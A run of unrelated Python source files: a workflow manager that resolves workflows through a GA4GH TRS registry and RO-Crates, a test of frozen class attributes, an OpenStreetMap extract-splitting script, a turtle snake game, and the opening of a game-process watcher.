                retval = subprocess.Popen(gitsubmodule_params, stdout=git_stdout, stderr=git_stderr,
                                          cwd=repo_tag_destdir).wait()
            # Proper error handling
            if retval != 0:
                # Reading the output and error for the report
                with open(git_stdout.name, "r") as c_stF:
                    git_stdout_v = c_stF.read()
                with open(git_stderr.name, "r") as c_stF:
                    git_stderr_v = c_stF.read()
                errstr = "ERROR: Unable to pull '{}' (tag '{}'). Retval {}\n======\nSTDOUT\n======\n{}\n======\nSTDERR\n======\n{}".format(
                    repoURL, repoTag, retval, git_stdout_v, git_stderr_v)
                raise WFException(errstr)
    # Last, we have to obtain the effective checkout
    gitrevparse_params = [
        self.git_cmd, 'rev-parse', '--verify', 'HEAD'
    ]
    with subprocess.Popen(gitrevparse_params, stdout=subprocess.PIPE, encoding='iso-8859-1',
                          cwd=repo_tag_destdir) as revproc:
        repo_effective_checkout = revproc.stdout.read().rstrip()
    return repo_tag_destdir, repo_effective_checkout
def getWorkflowRepoFromTRS(self, offline: bool = False) -> Tuple[WorkflowType, RepoURL, RepoTag, RelPath]:
    """
    Resolve the workflow described by self.id / self.version_id against
    the configured GA4GH TRS endpoint, and derive the repository (or
    raw files directory) holding the workflow entrypoint.

    :param offline: when True, only cached fetches are allowed
    :return: engine description, repo URL (or local files directory),
        repo tag (may be None) and relative path of the entrypoint
    :raises WFException: on any TRS metadata / tool / version lookup
        failure
    """
    # Now, time to check whether it is a TRSv2
    trs_endpoint_v2_meta = self.trs_endpoint + 'service-info'
    trs_endpoint_v2_beta2_meta = self.trs_endpoint + 'metadata'
    trs_endpoint_meta = None
    # Needed to store this metadata
    trsMetadataCache = os.path.join(self.metaDir, self.TRS_METADATA_FILE)
    try:
        metaContentKind , cachedTRSMetaFile , trsMetaMeta = self.cacheHandler.fetch(trs_endpoint_v2_meta, self.metaDir, offline)
        trs_endpoint_meta = trs_endpoint_v2_meta
    except WFException as wfe:
        # Fall back to the TRS v2 beta2 metadata endpoint
        try:
            metaContentKind , cachedTRSMetaFile , trsMetaMeta = self.cacheHandler.fetch(trs_endpoint_v2_beta2_meta, self.metaDir, offline)
            trs_endpoint_meta = trs_endpoint_v2_beta2_meta
        except WFException as wfebeta:
            raise WFException("Unable to fetch metadata from {} in order to identify whether it is a working GA4GH TRSv2 endpoint. Exceptions:\n{}\n{}".format(self.trs_endpoint, wfe, wfebeta))
    # Giving a friendly name
    if not os.path.exists(trsMetadataCache):
        os.symlink(os.path.basename(cachedTRSMetaFile), trsMetadataCache)
    with open(trsMetadataCache, mode="r", encoding="utf-8") as ctmf:
        self.trs_endpoint_meta = json.load(ctmf)
    # Minimal check
    trs_version = self.trs_endpoint_meta.get('api_version')
    if trs_version is None:
        trs_version = self.trs_endpoint_meta.get('type', {}).get('version')
    if trs_version is None:
        raise WFException("Unable to identify TRS version from {}".format(trs_endpoint_meta))
    # Now, check the tool does exist in the TRS, and the version
    trs_tools_url = parse.urljoin(self.trs_endpoint, self.TRS_TOOLS_PATH + parse.quote(self.id, safe=''))
    trsQueryCache = os.path.join(self.metaDir, self.TRS_QUERY_CACHE_FILE)
    _ , cachedTRSQueryFile , _ = self.cacheHandler.fetch(trs_tools_url, self.metaDir, offline)
    # Giving a friendly name
    if not os.path.exists(trsQueryCache):
        os.symlink(os.path.basename(cachedTRSQueryFile), trsQueryCache)
    with open(trsQueryCache, mode="r", encoding="utf-8") as tQ:
        rawToolDesc = tQ.read()
    # If the tool does not exist, an exception will be thrown before
    jd = json.JSONDecoder()
    toolDesc = jd.decode(rawToolDesc)
    # If the tool is not a workflow, complain
    if toolDesc.get('toolclass', {}).get('name', '') != 'Workflow':
        raise WFException(
            'Tool {} from {} is not labelled as a workflow. Raw answer:\n{}'.format(self.id, self.trs_endpoint,
                                                                                    rawToolDesc))
    possibleToolVersions = toolDesc.get('versions', [])
    if len(possibleToolVersions) == 0:
        raise WFException(
            'Version {} not found in workflow {} from {} . Raw answer:\n{}'.format(self.version_id, self.id,
                                                                                   self.trs_endpoint, rawToolDesc))
    toolVersion = None
    toolVersionId = self.version_id
    if (toolVersionId is not None) and len(toolVersionId) > 0:
        # An explicit version was requested: match it by id or by name
        for possibleToolVersion in possibleToolVersions:
            if isinstance(possibleToolVersion, dict):
                possibleId = str(possibleToolVersion.get('id', ''))
                possibleName = str(possibleToolVersion.get('name', ''))
                if self.version_id in (possibleId, possibleName):
                    toolVersion = possibleToolVersion
                    break
        else:
            # for-else: runs only when no version matched (no break)
            raise WFException(
                'Version {} not found in workflow {} from {} . Raw answer:\n{}'.format(self.version_id, self.id,
                                                                                       self.trs_endpoint,
                                                                                       rawToolDesc))
    else:
        # No version requested: keep the lexicographically largest id
        toolVersionId = ''
        for possibleToolVersion in possibleToolVersions:
            possibleToolVersionId = str(possibleToolVersion.get('id', ''))
            if len(possibleToolVersionId) > 0 and toolVersionId < possibleToolVersionId:
                toolVersion = possibleToolVersion
                toolVersionId = possibleToolVersionId
    if toolVersion is None:
        raise WFException(
            'No valid version was found in workflow {} from {} . Raw answer:\n{}'.format(self.id, self.trs_endpoint,
                                                                                         rawToolDesc))
    # The version has been found
    toolDescriptorTypes = toolVersion.get('descriptor_type', [])
    if not isinstance(toolDescriptorTypes, list):
        raise WFException(
            'Version {} of workflow {} from {} has no valid "descriptor_type" (should be a list). Raw answer:\n{}'.format(
                self.version_id, self.id, self.trs_endpoint, rawToolDesc))
    # Now, realize whether it matches
    chosenDescriptorType = self.descriptor_type
    if chosenDescriptorType is None:
        # Pick the first recognized descriptor type offered by the tool
        for candidateDescriptorType in self.RECOGNIZED_TRS_DESCRIPTORS.keys():
            if candidateDescriptorType in toolDescriptorTypes:
                chosenDescriptorType = candidateDescriptorType
                break
        else:
            # for-else: runs only when nothing was recognized (no break)
            raise WFException(
                'Version {} of workflow {} from {} has no acknowledged "descriptor_type". Raw answer:\n{}'.format(
                    self.version_id, self.id, self.trs_endpoint, rawToolDesc))
    elif chosenDescriptorType not in toolVersion['descriptor_type']:
        raise WFException(
            'Descriptor type {} not available for version {} of workflow {} from {} . Raw answer:\n{}'.format(
                self.descriptor_type, self.version_id, self.id, self.trs_endpoint, rawToolDesc))
    elif chosenDescriptorType not in self.RECOGNIZED_TRS_DESCRIPTORS:
        raise WFException(
            'Descriptor type {} is not among the acknowledged ones by this backend. Version {} of workflow {} from {} . Raw answer:\n{}'.format(
                self.descriptor_type, self.version_id, self.id, self.trs_endpoint, rawToolDesc))
    toolFilesURL = trs_tools_url + '/versions/' + parse.quote(toolVersionId, safe='') + '/' + parse.quote(chosenDescriptorType, safe='') + '/files'
    # Detecting whether RO-Crate trick will work
    if self.trs_endpoint_meta.get('organization',{}).get('name') == 'WorkflowHub':
        self.logger.debug("WorkflowHub workflow")
        # And this is the moment where the RO-Crate must be fetched
        roCrateURL = toolFilesURL + '?' + parse.urlencode({'format': 'zip'})
        return self.getWorkflowRepoFromROCrateURL(roCrateURL,
                                                  expectedEngineDesc=self.RECOGNIZED_TRS_DESCRIPTORS[
                                                      chosenDescriptorType], offline=offline)
    else:
        self.logger.debug("TRS workflow")
        # Learning the available files and maybe
        # which is the entrypoint to the workflow
        _ , trsFilesDir , trsFilesMeta = self.cacheHandler.fetch(INTERNAL_TRS_SCHEME_PREFIX + ':' + toolFilesURL, self.cacheTRSFilesDir, offline)
        expectedEngineDesc = self.RECOGNIZED_TRS_DESCRIPTORS[chosenDescriptorType]
        remote_workflow_entrypoint = trsFilesMeta[0].metadata.get('remote_workflow_entrypoint')
        if remote_workflow_entrypoint is not None:
            # Give it a chance to identify the original repo of the workflow
            repoURL, repoTag, repoRelPath = self.guessRepoParams(remote_workflow_entrypoint, fail_ok=False)
            if repoURL is not None:
                self.logger.debug("Derived repository {} ({} , rel {}) from {}".format(repoURL, repoTag, repoRelPath, trs_tools_url))
                return expectedEngineDesc , repoURL, repoTag, repoRelPath
        workflow_entrypoint = trsFilesMeta[0].metadata.get('workflow_entrypoint')
        if workflow_entrypoint is not None:
            self.logger.debug("Using raw files from TRS tool {}".format(trs_tools_url))
            repoDir = trsFilesDir
            repoRelPath = workflow_entrypoint
            return expectedEngineDesc , repoDir, None, repoRelPath
    raise WFException("Unable to find a workflow in {}".format(trs_tools_url))
def getWorkflowRepoFromROCrateURL(self, roCrateURL, expectedEngineDesc: WorkflowType = None, offline: bool = False) -> Tuple[WorkflowType, RepoURL, RepoTag, RelPath]:
    """
    Fetch the RO-Crate pointed to by the URL and derive from it the
    workflow engine plus the repository coordinates.

    :param roCrateURL: URL of the RO-Crate to download
    :param expectedEngineDesc: If defined, an instance of WorkflowType
    :param offline: when True, only cached downloads are allowed
    :return: engine description, repo URL, repo tag and relative path
    """
    localROCrate = self.downloadROcrate(roCrateURL, offline=offline)
    self.logger.info("downloaded RO-Crate: {} -> {}".format(roCrateURL, localROCrate))
    return self.getWorkflowRepoFromROCrateFile(localROCrate, expectedEngineDesc)
def getWorkflowRepoFromROCrateFile(self, roCrateFile: AbsPath, expectedEngineDesc: WorkflowType = None) -> Tuple[WorkflowType, RepoURL, RepoTag, RelPath]:
    """
    Inspect a local RO-Crate, identify the workflow engine from the
    declared programming language, and guess the git repository
    coordinates of the workflow.

    :param roCrateFile: local path of the RO-Crate
    :param expectedEngineDesc: If defined, an instance of WorkflowType
    :return: engine description, repo URL, repo tag and relative path
    :raises WFException: when the engine cannot be recognized, does not
        match the expected one, or the repository cannot be guessed
    """
    roCrateObj = rocrate.ROCrate(roCrateFile)
    # TODO: get roCrateObj mainEntity programming language
    # self.logger.debug(roCrateObj.root_dataset.as_jsonld())
    mainEntityProgrammingLanguageId = None
    mainEntityProgrammingLanguageUrl = None
    mainEntityIdHolder = None
    mainEntityId = None
    workflowPID = None
    workflowUploadURL = None
    workflowTypeId = None
    # Walk the entities, chaining metadata descriptor -> main entity ->
    # programming language (relies on the crate's entity ordering)
    for e in roCrateObj.get_entities():
        if (mainEntityIdHolder is None) and e['@type'] == 'CreativeWork' and '.json' in e['@id']:
            mainEntityIdHolder = e.as_jsonld()['about']['@id']
        elif e['@id'] == mainEntityIdHolder:
            eAsLD = e.as_jsonld()
            mainEntityId = eAsLD['mainEntity']['@id']
            workflowPID = eAsLD.get('identifier')
        elif e['@id'] == mainEntityId:
            eAsLD = e.as_jsonld()
            workflowUploadURL = eAsLD.get('url')
            workflowTypeId = eAsLD['programmingLanguage']['@id']
        elif e['@id'] == workflowTypeId:
            # A bit dirty, but it works
            eAsLD = e.as_jsonld()
            mainEntityProgrammingLanguageId = eAsLD.get('identifier', {}).get('@id')
            mainEntityProgrammingLanguageUrl = eAsLD.get('url', {}).get('@id')
    # Now, it is time to match the language id
    engineDescById = None
    engineDescByUrl = None
    for possibleEngineDesc in self.WORKFLOW_ENGINES:
        if (engineDescById is None) and (mainEntityProgrammingLanguageId is not None):
            for pat in possibleEngineDesc.uriMatch:
                if isinstance(pat, Pattern):
                    match = pat.search(mainEntityProgrammingLanguageId)
                    if match:
                        engineDescById = possibleEngineDesc
                elif pat == mainEntityProgrammingLanguageId:
                    engineDescById = possibleEngineDesc
        if (engineDescByUrl is None) and (mainEntityProgrammingLanguageUrl == possibleEngineDesc.url):
            engineDescByUrl = possibleEngineDesc
    # The id-based match takes precedence over the url-based one
    engineDesc = None
    if engineDescById is not None:
        engineDesc = engineDescById
    elif engineDescByUrl is not None:
        engineDesc = engineDescByUrl
    else:
        raise WFException(
            'Found programming language {} (url {}) in RO-Crate manifest is not among the acknowledged ones'.format(
                mainEntityProgrammingLanguageId, mainEntityProgrammingLanguageUrl))
    if (engineDescById is not None) and (engineDescByUrl is not None) and engineDescById != engineDescByUrl:
        self.logger.warning('Found programming language {} (url {}) leads to different engines'.format(
            mainEntityProgrammingLanguageId, mainEntityProgrammingLanguageUrl))
    if (expectedEngineDesc is not None) and engineDesc != expectedEngineDesc:
        raise WFException(
            'Expected programming language {} does not match identified one {} in RO-Crate manifest'.format(
                expectedEngineDesc.engineName, engineDesc.engineName))
    # This workflow URL, in the case of github, can provide the repo,
    # the branch/tag/checkout , and the relative directory in the
    # fetched content (needed by Nextflow)
    # Some RO-Crates might have this value missing or ill-built
    # NOTE(review): when workflowUploadURL is None, repoURL below is
    # never bound before the return -- confirm whether such crates can
    # reach this point
    if workflowUploadURL is not None:
        repoURL, repoTag, repoRelPath = self.guessRepoParams(workflowUploadURL, fail_ok=False)
        if repoURL is None:
            # Fall back to the crate-level isBasedOn reference
            repoURL, repoTag, repoRelPath = self.guessRepoParams(roCrateObj.root_dataset['isBasedOn'], fail_ok=False)
            if repoURL is None:
                raise WFException('Unable to guess repository from RO-Crate manifest')
    # It must return four elements:
    return engineDesc, repoURL, repoTag, repoRelPath
def guessRepoParams(self, wf_url: Union[URIType, parse.ParseResult], fail_ok: bool = True) -> Tuple[RepoURL, RepoTag, RelPath]:
    """
    Guess the git repository URL, tag/branch and relative path from a
    workflow URL. Understood forms: pip-style git+ URIs, github.com
    blob/tree URLs and raw.githubusercontent.com URLs.

    :param wf_url: the URL (or pre-parsed ParseResult) to analyse
    :param fail_ok: NOTE(review): despite its name, an exception for
        unsupported URLs is raised when this flag is True; callers in
        this file pass fail_ok=False and test the returned repoURL for
        None instead. The naming looks inverted -- confirm before
        changing, since callers depend on the current behaviour.
    :return: (repoURL, repoTag, repoRelPath), each possibly None
    """
    repoURL = None
    repoTag = None
    repoRelPath = None
    # Deciding which is the input
    if isinstance(wf_url, parse.ParseResult):
        parsed_wf_url = wf_url
    else:
        parsed_wf_url = parse.urlparse(wf_url)
    # These are the usual URIs which can be understood by pip
    # See https://pip.pypa.io/en/stable/cli/pip_install/#git
    if parsed_wf_url.scheme.startswith('git+') or parsed_wf_url.scheme == 'git':
        # Getting the scheme git is going to understand
        if len(parsed_wf_url.scheme) > 3:
            gitScheme = parsed_wf_url.scheme[4:]
        else:
            gitScheme = parsed_wf_url.scheme
        # Getting the tag or branch
        if '@' in parsed_wf_url.path:
            gitPath , repoTag = parsed_wf_url.path.split('@',1)
        else:
            gitPath = parsed_wf_url.path
        # Getting the repoRelPath (if available)
        if len(parsed_wf_url.fragment) > 0:
            frag_qs = parse.parse_qs(parsed_wf_url.fragment)
            subDirArr = frag_qs.get('subdirectory',[])
            if len(subDirArr) > 0:
                repoRelPath = subDirArr[0]
        # Now, reassemble the repoURL
        repoURL = parse.urlunparse((gitScheme, parsed_wf_url.netloc, gitPath, '', '', ''))
    # TODO handling other popular cases, like bitbucket
    elif parsed_wf_url.netloc == 'github.com':
        wf_path = parsed_wf_url.path.split('/')
        if len(wf_path) >= 3:
            repoGitPath = wf_path[:3]
            if not repoGitPath[-1].endswith('.git'):
                repoGitPath[-1] += '.git'
            # Rebuilding repo git path
            repoURL = parse.urlunparse(
                (parsed_wf_url.scheme, parsed_wf_url.netloc, '/'.join(repoGitPath), '', '', ''))
            # And now, guessing the tag and the relative path
            if len(wf_path) >= 5 and (wf_path[3] in ('blob', 'tree')):
                repoTag = wf_path[4]
                if len(wf_path) >= 6:
                    repoRelPath = '/'.join(wf_path[5:])
    elif parsed_wf_url.netloc == 'raw.githubusercontent.com':
        wf_path = parsed_wf_url.path.split('/')
        if len(wf_path) >= 3:
            # Rebuilding it
            repoGitPath = wf_path[:3]
            repoGitPath[-1] += '.git'
            # Rebuilding repo git path
            repoURL = parse.urlunparse(
                ('https', 'github.com', '/'.join(repoGitPath), '', '', ''))
            # And now, guessing the tag/checkout and the relative path
            if len(wf_path) >= 4:
                repoTag = wf_path[3]
                if len(wf_path) >= 5:
                    repoRelPath = '/'.join(wf_path[4:])
    elif fail_ok:
        # NOTE(review): raises when fail_ok is True -- see docstring
        raise WFException("FIXME: Unsupported http(s) git repository {}".format(wf_url))
    self.logger.debug("From {} was derived {} {} {}".format(wf_url, repoURL, repoTag, repoRelPath))
    return repoURL, repoTag, repoRelPath
def downloadROcrate(self, roCrateURL, offline: bool = False) -> AbsPath:
    """
    Download RO-crate from WorkflowHub (https://dev.workflowhub.eu/)
    using GA4GH TRS API and cache it locally.

    :param roCrateURL: URL of the RO-Crate to fetch
    :param offline: Are we in offline mode?
    :type roCrateURL: str
    :type offline: bool
    :return: absolute path of the locally cached RO-Crate file
    :raises WFException: when the RO-Crate cannot be fetched
    """
    try:
        roCK , roCrateFile , _ = self.cacheHandler.fetch(roCrateURL, self.cacheROCrateDir, offline)
    except Exception as e:
        # Chain the original exception for easier debugging
        raise WFException("Cannot download RO-Crate from {}, {}".format(roCrateURL, e)) from e
    # sha1 is used only for a stable cache filename, not for security
    crate_hashed_id = hashlib.sha1(roCrateURL.encode('utf-8')).hexdigest()
    cachedFilename = os.path.join(self.cacheROCrateDir, crate_hashed_id + self.DEFAULT_RO_EXTENSION)
    if not os.path.exists(cachedFilename):
        # Friendly, stable name pointing to the cached content
        os.symlink(os.path.basename(roCrateFile),cachedFilename)
    self.cacheROCrateFilename = cachedFilename
    return cachedFilename
def downloadInputFile(self, remote_file, workflowInputs_destdir: AbsPath = None,
                      contextName=None, offline: bool = False, ignoreCache:bool=False, registerInCache:bool=True) -> MaterializedContent:
    """
    Download remote file or directory / dataset.

    :param remote_file: URL or CURIE to download remote file
    :param workflowInputs_destdir: destination directory (defaults to
        the workflow inputs cache directory)
    :param contextName: name of the security context to use, if any
    :param offline: when True, only cached content may be used
    :param ignoreCache: when True, bypass the cache on fetch
    :param registerInCache: when True, register the fetched content
    :type remote_file: str
    :raises RuntimeError: when remote_file is not a valid URL/CURIE
    :raises WFException: when the requested security context is missing
    """
    parsedInputURL = parse.urlparse(remote_file)
    # Both a scheme and a path are needed to consider it fetchable
    if not all([parsedInputURL.scheme, parsedInputURL.path]):
        raise RuntimeError("Input is not a valid remote URL or CURIE source")
    prettyFilename = parsedInputURL.path.split('/')[-1]
    # Assure workflow inputs directory exists before the next step
    if workflowInputs_destdir is None:
        workflowInputs_destdir = self.cacheWorkflowInputsDir
    self.logger.info("downloading workflow input: {}".format(remote_file))
    # Security context is obtained here
    secContext = None
    if contextName is not None:
        secContext = self.creds_config.get(contextName)
        if secContext is None:
            raise WFException(
                'No security context {} is available, needed by {}'.format(contextName, remote_file))
    inputKind, cachedFilename, metadata_array = self.cacheHandler.fetch(remote_file, workflowInputs_destdir, offline, ignoreCache, registerInCache, secContext)
    self.logger.info("downloaded workflow input: {} => {}".format(remote_file, cachedFilename))
    return MaterializedContent(cachedFilename, remote_file, prettyFilename, inputKind, metadata_array)
|
test_frozen_attribs.py | from typing import Dict, Any
from torch import nn
from core.base_abstractions.experiment_config import ExperimentConfig
from core.base_abstractions.task import TaskSampler
from utils.experiment_utils import TrainingPipeline
import torch.multiprocessing as mp
# noinspection PyAbstractClass,PyTypeChecker
class MyConfig(ExperimentConfig):
    """Minimal ExperimentConfig used to exercise frozen class variables."""
    # Class-level variable whose (im)mutability is under test
    MY_VAR: int = 3
    @classmethod
    def tag(cls) -> str:
        return ""
    @classmethod
    def training_pipeline(cls, **kwargs) -> TrainingPipeline:
        # Stub: a real pipeline is not needed for these tests
        return None
    @classmethod
    def create_model(cls, **kwargs) -> nn.Module:
        # Stub: a real model is not needed for these tests
        return None
    @classmethod
    def make_sampler_fn(cls, **kwargs) -> TaskSampler:
        # Stub: a real sampler is not needed for these tests
        return None
    def my_var_is(self, val):
        """Assert that MY_VAR (class- or instance-level) equals ``val``."""
        assert self.MY_VAR == val
# noinspection PyAbstractClass
class MySpecConfig(MyConfig):
    """Concrete subclass overriding MY_VAR at class-definition time."""
    MY_VAR = 6
    @classmethod
    def machine_params(cls, mode="train", **kwargs) -> Dict[str, Any]:
        return {}
    @classmethod
    def tag(cls) -> str:
        return "SpecTag"
# Module-level instance shared by the tests below (also handed to
# worker processes in test_frozen_experiment_config)
scfg = MySpecConfig()
class TestFrozenAttribs(object):
    """Tests for the FrozenClassVariables metaclass behaviour."""
    def test_frozen_inheritance(self):
        """Class attributes are frozen on classes, but instances may shadow them."""
        from abc import abstractmethod
        from core.base_abstractions.experiment_config import FrozenClassVariables
        class SomeBase(metaclass=FrozenClassVariables):
            yar = 3
            @abstractmethod
            def use(self):
                raise NotImplementedError()
        class SomeDerived(SomeBase):
            yar = 33
            def use(self):
                return self.yar
        failed = False
        try:
            SomeDerived.yar = 6  # Error
        except Exception as _:
            failed = True
        assert failed
        inst = SomeDerived()
        inst2 = SomeDerived()
        inst.yar = 12  # No error
        # Instance-level assignment shadows the class attribute on inst only
        assert inst.use() == 12
        assert inst2.use() == 33
    @staticmethod
    def my_func(config, val):
        # Helper run in a child process: checks MY_VAR survived the transfer
        config.my_var_is(val)
    def test_frozen_experiment_config(self):
        """Class-level mutation must raise; instance-level must work,
        including across process boundaries."""
        val = 5
        failed = False
        try:
            MyConfig()  # expected to raise (base config is not instantiable)
        except:
            failed = True
        assert failed
        # Instance-level assignment is allowed and observable
        scfg.MY_VAR = val
        scfg.my_var_is(val)
        failed = False
        try:
            MyConfig.MY_VAR = val
        except RuntimeError:
            failed = True
        assert failed
        failed = False
        try:
            MySpecConfig.MY_VAR = val
        except RuntimeError:
            failed = True
        assert failed
        # The instance attribute must also be visible in child processes
        for fork_method in ["forkserver", "fork"]:
            ctxt = mp.get_context(fork_method)
            p = ctxt.Process(target=self.my_func, kwargs=dict(config=scfg, val=val))
            p.start()
            p.join()
if __name__ == "__main__":
    # Run both checks directly when invoked as a script
    suite = TestFrozenAttribs()
    suite.test_frozen_inheritance()  # type:ignore
    suite.test_frozen_experiment_config()  # type:ignore
|
split-all-clipbounds.py | #!/usr/bin/python
# NOTE: this is a Python 2 script (print statements, the Queue module).
import sys, os, tempfile
from datetime import datetime
import Queue, threading
import random, time
# just simulate the splitting by sleeping for a random number of seconds,
# used to test multi-process handling
simulate = True
# the directory to scan for clipbounds-files
clipDir = "clipbounds"
# the type of clipbounds to use (OSM or POLY)
clipType = "POLY" # OSM
clipExtension = ".poly" # .osm
# the clipbounds are read from the directory and created in a hierarchy, so
# clipbounds/europe.poly is read from the planetfile
# clipbounds/asia.poly is read from the planetfile
# clipbounds/europe/germany.poly is read from the generated europe.osm.pbf
# clipbounds/europe/italy.poly is read from the generated europe.osm.pbf
# clipbounds/foo/bar.poly is read from the planetfile, because there was no foo.poly
# the desired result datatype (.osm.pbf, .osh.pbf, .osm, .osh, ...)
dataType = ".osm.pbf"
# the maximum number of parallel running extracts
# this is ( <your systems memory in GB> - 1) * 1024 / <size per extract>
# where <size per extract> is 190 MB for Hardcut and 350 MB for Softcut
#
# to achieve best results, set maxProcesses = 1 and start with a low value
# for maxParallel, then run the tool a little. increase maxParallel,
# re-run the tool for some seconds, ...
# when creating the last bit-vector takes more time than creating the
# first vectors, the os starts to swap the bit-vectors out. reduce the
# number by one and try again
maxParallel = 8
# the number of parallel extracts is determined by the available memory.
# when all bit-vectors fit into the RAM, runtime is mostly a matter of CPU.
# if you have multiple cores, you can split quicker by distributing the
# point-in-polygon tests about your cores. This increases the number of
# disk-seeks, because multiple processes try to access the same file,
# but in most cases this should not hit the performance much.
maxProcesses = 4
# on my PC (4 GB, 4 Cores) I achieved best results when doing 8 extracts
# in parallel with 4 processes.
# the source file
inputFile = "/home/peter/osm-data/planet-latest.osm.pbf"
# the directory to place the generated extracts into
outputDir = "o"
# path to the compiled splitter
splitterCommand = "osm-history-splitter"
# --plan mode: single process; note this is Python 2 integer division
if(sys.argv.count("--plan") > 0):
    maxParallel = maxParallel / maxProcesses
    maxProcesses = 1
# serializes print output from the worker threads
printlock = threading.Lock()
# unbounded queue of task groups, consumed by the worker threads
q = Queue.Queue(0)
# names of extracts already produced (checked before dependent splits)
finished = []
def process(tasks):
    """Run one splitter invocation that extracts all `tasks` from a shared source.

    `tasks` is a list of extract names relative to clipDir (without extension);
    all entries of a batch share the same parent directory and therefore the
    same source file. Writes a temporary splitter config file, spawns the
    splitter (or sleeps, when simulating), then marks the tasks as finished.

    NOTE(review): `simulate`, `clipType` and `clipDir` are not defined in this
    view — presumably set near the top of the file; verify.
    NOTE(review): `finished` is a plain list appended/read from several worker
    threads without a lock — relies on CPython atomicity; confirm acceptable.
    """
    # The parent directory of the first task determines the source file.
    (source, foo) = os.path.split(tasks[0])
    if(source == ""):
        # top-level extract: cut directly from the planet file
        source = inputFile
    else:
        # nested extract: its parent extract must be finished first
        if finished.count(source) == 0:
            printlock.acquire()
            print "trying to split from", source, "which is not finished yet, re-queuing and sleeping 5 seconds"
            printlock.release()
            q.put(tasks)
            time.sleep(5)
            return
        source = outputDir + "/" + source + dataType
        # fall back to the planet file when the parent output is missing
        if not simulate and not os.path.exists(source):
            source = inputFile
    printlock.acquire()
    print "splitting", source, "to", tasks
    printlock.release()
    # in --plan mode only the schedule is printed, nothing is executed
    if(sys.argv.count("--plan") > 0):
        return
    # Build a one-shot splitter config file: "<dest>\t<cliptype>\t<polyfile>\n" per task.
    (fp, configfile) = tempfile.mkstemp()
    os.write(fp, "# auto-generated\n")
    for task in tasks:
        dest = os.path.join(outputDir, task + dataType)
        dirname = os.path.dirname(dest)
        if not os.path.exists(dirname):
            # NOTE(review): exists/mkdir is racy between workers and os.mkdir
            # creates only one level — verify directory depth assumptions.
            printlock.acquire()
            print "Creating", dirname
            os.mkdir(dirname)
            printlock.release()
        os.write(fp, dest)
        os.write(fp, "\t")
        os.write(fp, clipType)
        os.write(fp, "\t")
        os.write(fp, clipDir + "/" + task + clipExtension)
        os.write(fp, "\n")
    os.close(fp)
    start = datetime.now()
    if(simulate):
        time.sleep(random.randint(1, 10))
    else:
        # blocking call; one splitter process per worker thread
        os.spawnl(os.P_WAIT, splitterCommand, splitterCommand, "--softcut", source, configfile)
    printlock.acquire()
    print "finished splitting to", tasks
    print "runtime:", datetime.now() - start
    printlock.release()
    for task in tasks:
        finished.append(task)
    os.unlink(configfile)
def worker():
    """Worker-thread loop: pull task batches off the queue until process exit.

    Runs forever; the thread is started as a daemon, so it dies with the
    main thread once q.join() returns.
    """
    while True:
        batch = q.get()
        process(batch)
        q.task_done()
# Start the worker pool (daemon threads exit together with the main thread).
print "starting", maxProcesses, "threads"
for i in range(maxProcesses):
    t = threading.Thread(target=worker)
    t.daemon = True
    t.start()
# Batch size of each queued work item (Python-2 integer division).
tasksPerProc = maxParallel / maxProcesses
tasks = []
lastdir = "";
# Breadth-first walk over the clip-bounds tree; .poly files of one directory
# are batched together so each batch shares a single source file.
stack = [clipDir]
while stack:
    directory = stack.pop(0)
    for base in sorted(os.listdir(directory)):
        name = os.path.join(directory, base)
        if os.path.isdir(name):
            if not os.path.islink(name):
                stack.append(name)
        else:
            if name.endswith(clipExtension):
                name = os.path.relpath(name, clipDir)
                (name, ext) = os.path.splitext(name)
                # flush the batch when the directory changes or the batch is full
                if len(tasks) > 0 and (lastdir != directory or len(tasks) == tasksPerProc):
                    q.put(tasks)
                    tasks = []
                lastdir = directory
                tasks.append(name)
# NOTE(review): the final partial batch left in `tasks` is never q.put() before
# q.join(), so the last group of extracts appears to be silently dropped — verify.
q.join()
|
snake.py | """
Juego de la serpiente
"""
from turtle import update, ontimer, setup, hideturtle, tracer, listen, onkey, \
done, clear
from random import randrange, choice
from freegames import square, vector
from playsound import playsound
from threading import Thread
# Shared game state, mutated by the handlers below.
food = vector(0, 0)      # current food position on the grid
snake = [vector(10, 0)]  # snake body segments, tail first, head last
aim = vector(0, -10)     # current heading, applied once per tick
def musica():
    """Play the background music; blocks, so it runs on a daemon thread."""
    playsound('musicaF.mid')
def colores():
    """Return the color palette available for the game.

    Bug fix: the original assigned the list to a local variable and
    discarded it, so the function had no effect at all. Returning the
    palette is backward compatible — previous callers ignored the
    (None) return value.
    """
    return ["red", "black", "yellow", "orange"]
def change(x, y):
    """Point the snake's heading at the direction vector (x, y)."""
    aim.y = y
    aim.x = x
def inside(head):
    """Return True when *head* lies within the playing-field boundaries."""
    within_x = -200 < head.x < 190
    within_y = -200 < head.y < 190
    return within_x and within_y
def move():
    """Advance the snake one step and schedule the next tick, unless the game ends."""
    new_head = snake[-1].copy()
    new_head.move(aim)

    # Hitting a wall or the snake's own body ends the game: draw the
    # crash cell in red and stop scheduling ticks.
    if new_head in snake or not inside(new_head):
        square(new_head.x, new_head.y, 9, 'red')
        update()
        return

    snake.append(new_head)
    if new_head == food:
        # Grew by one: keep the tail and respawn the food on a random grid cell.
        print('Snake:', len(snake))
        food.x = 10 * randrange(-15, 15)
        food.y = 10 * randrange(-15, 15)
    else:
        # Nothing eaten: drop the tail so the length stays constant.
        del snake[0]

    clear()
    for segment in snake:
        square(segment.x, segment.y, 9, 'black')
    square(food.x, food.y, 9, 'green')
    update()
    ontimer(move, 100)
# Background music runs on a daemon thread so it never blocks the game loop
# and dies together with the main thread.
music = Thread(target=musica)
music.daemon = True
music.start()
# Turtle window setup: 420x420 pixels at screen offset (370, 0).
setup(420, 420, 370, 0)
hideturtle()
tracer(False)  # manual update() calls instead of per-draw refreshes
listen()
# Arrow keys steer the snake.
onkey(lambda: change(10, 0), 'Right')
onkey(lambda: change(-10, 0), 'Left')
onkey(lambda: change(0, 10), 'Up')
onkey(lambda: change(0, -10), 'Down')
move()   # kick off the self-rescheduling game loop
done()
|
local_game_status.py | import time
import logging as log
import re
from file_read_backwards import FileReadBackwards
from threading import Thread
import psutil as psutil
from definitions import UbisoftGame, GameType, GameStatus, ProcessType, WatchedProcess, SYSTEM, System
from steam import get_steam_game_status
from local_helper import get_local_game_path, get_game_installed_status
class ProcessWatcher(object):
    """Tracks launcher/game processes so their liveness can be polled later."""

    def __init__(self):
        # WatchedProcess entries currently being tracked.
        self.watched_processes = []

    def watch_process(self, proces, game=None):
        """Start tracking *proces*; return the WatchedProcess, or None on failure.

        ``game`` distinguishes a game process from the launcher itself.
        (The parameter name ``proces`` is kept for call compatibility.)
        """
        try:
            process = WatchedProcess(
                process=proces,
